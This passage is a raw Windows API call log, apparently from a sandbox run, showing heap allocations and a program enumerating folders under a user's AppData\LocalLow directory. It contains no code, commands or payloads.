[0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.694] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.694] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.696] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0060.696] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0060.696] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.696] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.696] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.697] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.697] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0060.697] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.697] PathFindFileNameW (pszPath="") returned="" [0060.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.697] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.697] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.697] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0060.697] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0060.697] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.697] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.697] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.697] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.697] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0060.697] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0060.698] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.698] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.698] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.698] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.698] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.698] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.698] PathFindFileNameW (pszPath="") returned="" [0060.698] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.698] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.698] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.698] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0060.698] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0060.698] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0060.698] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.698] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.698] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262b28 | out: hHeap=0x660000) returned 1 [0060.698] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.698] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.698] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0060.699] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0060.699] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.699] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.699] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.699] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.699] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.699] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.699] PathFindFileNameW (pszPath="") returned="" [0060.699] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.752] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.752] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.752] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.752] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.752] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.752] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.752] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.752] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0060.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0060.752] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.753] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.753] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.753] PathFindFileNameW (pszPath="") returned="" [0060.753] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.753] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.753] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.753] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.753] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.753] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0060.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0060.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 